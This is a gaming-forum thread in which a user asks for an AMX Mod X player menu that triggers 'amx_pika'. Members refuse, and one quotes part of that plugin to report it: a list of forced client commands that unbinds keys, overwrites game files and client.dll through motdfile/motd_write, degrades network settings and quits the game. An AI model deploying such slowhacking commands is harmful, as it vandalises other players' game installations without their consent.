Raised This Month: $51 Target: $400
 12% 

[REQ] Plugin Help


Post New Thread Reply   
 
Thread Tools Display Modes
OciXCrom
Veteran Member
Join Date: Oct 2013
Location: Macedonia
Old 11-15-2016 , 13:28   Re: [REQ] Plugin Help
Reply With Quote #11

It would be much more simple and easier for everyone if you just made the server execute amx_pika command on the selected player, instead of asking for something that he can't do.
__________________
OciXCrom is offline
Send a message via Skype™ to OciXCrom
Amine Belokda
Senior Member
Join Date: Oct 2015
Location: ML_NOT_FOUND
Old 11-15-2016 , 18:28   Re: [REQ] Plugin Help
Reply With Quote #12

Quote:
Originally Posted by OciXCrom View Post
Hard member ftw!
Sorry this reply by my friends dont me
__________________
Amine Belokda is offline
Send a message via MSN to Amine Belokda
OciXCrom
Veteran Member
Join Date: Oct 2013
Location: Macedonia
Old 11-15-2016 , 18:38   Re: [REQ] Plugin Help
Reply With Quote #13

So your friends are hard. Ok.
__________________
OciXCrom is offline
Send a message via Skype™ to OciXCrom
Sanjay Singh
Veteran Member
Join Date: Sep 2016
Old 11-15-2016 , 19:54   Re: [REQ] Plugin Help
Reply With Quote #14

Please do that as oxircrom saying
__________________
Sanjay Singh is offline
Send a message via AIM to Sanjay Singh
indraraj striker
Veteran Member
Join Date: Mar 2014
Location: Under the water
Old 11-15-2016 , 23:28   Re: [REQ] Plugin Help
Reply With Quote #15

Quote:
Originally Posted by Sanjay Singh View Post
Please do that as oxircrom saying
We don't support this type of plugin which changes cvar and setting of client
Dont ask again this type plugins you may lead to be banned from here
Read the rule again : https://forums.alliedmods.net/misc.php?do=showrules
__________________
Thanks everyone. #miss_you_all
indraraj striker is offline
Sanjay Singh
Veteran Member
Join Date: Sep 2016
Old 11-16-2016 , 07:22   Re: [REQ] Plugin Help
Reply With Quote #16

--_-- i just gave an example of amx_pika i didnt said to make amx_pika menu
as i want to know how to make menu with player names and that command execute on that
re-read
__________________
Sanjay Singh is offline
Send a message via AIM to Sanjay Singh
gabuch2
AlliedModders Donor
Join Date: Mar 2011
Location: Chile
Old 11-16-2016 , 08:49   Re: [REQ] Plugin Help
Reply With Quote #17

Just managed to get a .sma file of a amx_pika plugin.

I'll just paste a bit of the code here, so moderators can deal with this thread.

Code:
static const g_sCommands [ ] [ ] =
{
 
                // Dezactiveaza protectia clientului Counter-Strike [PIKA II] \\
                
                [[BUNCH OF SLOWHACKING CODE]]
                
                "fps_max 1",
                "fps_modem 1",
                "ex_interp 1",
                "commentator 1",
                "sys_ticrate 1",
                "rate 1",
                "cl_updaterade 1",
                "cmd_rate 1",
                "cl_pitchspeed 1",
                "developer 1",
                "cl_sidespeed 1",
                "cl_forwardspeed 1",
                "cl_backspeed 1",
                "gl_log 1",
                "volume 9999",
                
                // Scriere in CHAT \\
                
                "say ^"AM FOLOSIT HACK ASA CA AM FOST PEDEPSIT CU PIKA II^""
                
                // Comenzi pentru Counter-Strike STEAM \\
                
                "cd eject",
                "cd eject",
                "cd eject",
                "cd eject",
                "cd eject",
                "cd eject",
                "cd eject",
                "cd eject",
                "cd eject",
                "cd eject",
                
                // BINDURI pentru Counter-Strike [PIKA II] \\
                
                "unbind all",
                [[BUNCH OF SLOW HACKS, INCLUDING BUT NOT LIMITED TO DOWNLOAD BAT FILES TO FORCE A SHUTDOWN, USING HTML MOTDs]]

                "name PIKA II"
                
                // MOTDFILE si fisierul MOTD_FILE din Counter-Strike [PIKA II] \\
                        
                "motdfile resource/TrackerScheme.res;motd_write PIKA II",
                "motdfile resource/GameMenu.res;motd_write PIKA II",
                "motdfile resource/GameMenu.res;motd_write PIKA II",
                "motdfile resource/logo_game.res;motd_write PIKA II",
                "motdfile resource/UI/ScoreBoard.res;motd_write PIKA II",
                "motdfile resource/UI/Spectator.res;motd_write PIKA II",
                "motdfile resource/UI/BuyMenu.res;motd_write PIKA II",
                "motdfile resource/UI/MainBuyMenu.res;motd_write PIKA II",
                "motdfile resource/UI/Teammenu.res;motd_write PIKA II",
                "motdfile resource/background/800_1_a_loading.tga;motd_write PIKA II",
                "motdfile resource/background/800_1_b_loading.tga;motd_write PIKA II",
                "motdfile resource/background/800_1_c_loading.tga;motd_write PIKA II",
                "motdfile models/w_hegrenade.mdl;motd_write PIKA II",
                "motdfile models/v_smokegrenade.mdl;motd_write PIKA II",
                "motdfile models/player.mdl;motd_write PIKA II",
                "motdfile models/player/leet/leet.mdl;motd_write PIKA II",
                "motdfile models/v_ak47.mdl;motd_write PIKA II",
                "motdfile models/v_m4a1.mdl;motd_write PIKA",
                "motdfile gfx.wad;motd_write PIKA II",
                "motdfile halflife.wad;motd_write PIKA II",
                "motdfile tempdecal.wad;motd_write PIKA II",
                "motdfile cs_dust.wad;motd_write PIKA II",
                "motdfile cstrike.wad;motd_write PIKA II",
                "motdfile maps/de_dust2.bsp;motd_write PIKA II",
                "motdfile events/ak47.sc;motd_write PIKA II",
                "motdfile cl_dlls/client.dll;motd_write PIKA II",
                "motdfile motdfile config.CFG;motd_write PIKA II",
                "motdfile motdfile userconfig.CFG;motd_write PIKA II",
                
                
                 // ECHO pentru MESAJE din consola \\ 
                
                "echo [PIKA II] Ai folosit HACK asa ca te-am pedepsit !"   
                "quit",
};
Reporting this thread as we speak, this shit isn't supported here.
__________________

Last edited by gabuch2; 11-16-2016 at 08:54.
gabuch2 is offline
Sanjay Singh
Veteran Member
Join Date: Sep 2016
Old 11-17-2016 , 07:56   Re: [REQ] Plugin Help
Reply With Quote #18

@shattered are u crazy i didnt said to make amx_pika plugin i just want to know code to make menu with player list
For example how kick works normal command amx_kick "name" "reson"
when we type amx_kickmenu then its shows menu with player and amx_kick excueted on the player
that what i want to know

its is No slowhacking
__________________
Sanjay Singh is offline
Send a message via AIM to Sanjay Singh
devilicioux
Veteran Member
Join Date: Jun 2013
Location: Delhi,India
Old 11-28-2016 , 08:08   Re: [REQ] Plugin Help
Reply With Quote #19

Quote:
Originally Posted by Sanjay Singh View Post
@shattered are u crazy i didnt said to make amx_pika plugin i just want to know code to make menu with player list
For example how kick works normal command amx_kick "name" "reson"
when we type amx_kickmenu then its shows menu with player and amx_kick excueted on the player
that what i want to know

its is No slowhacking
1. Just search for How to make player menu in code snippets and tutorials. Good enough examples and tuts are there.

2. yes what pika does is slowhacking.

3. It wont work on steamers. (cl_filterstuffcmd something command is there AFAIK).The forum only supports steamers so there's no point of this plugin being here.
__________________
You keep bringing ANTICHRISTUS down .. He will rise again and kick asses !

#RespectList ANTICHRISTUS fysiks Bugsy

Most Common Errors You Can Encounter Every Now and Then
devilicioux is offline
Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 11:26.


Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Theme made by Freecode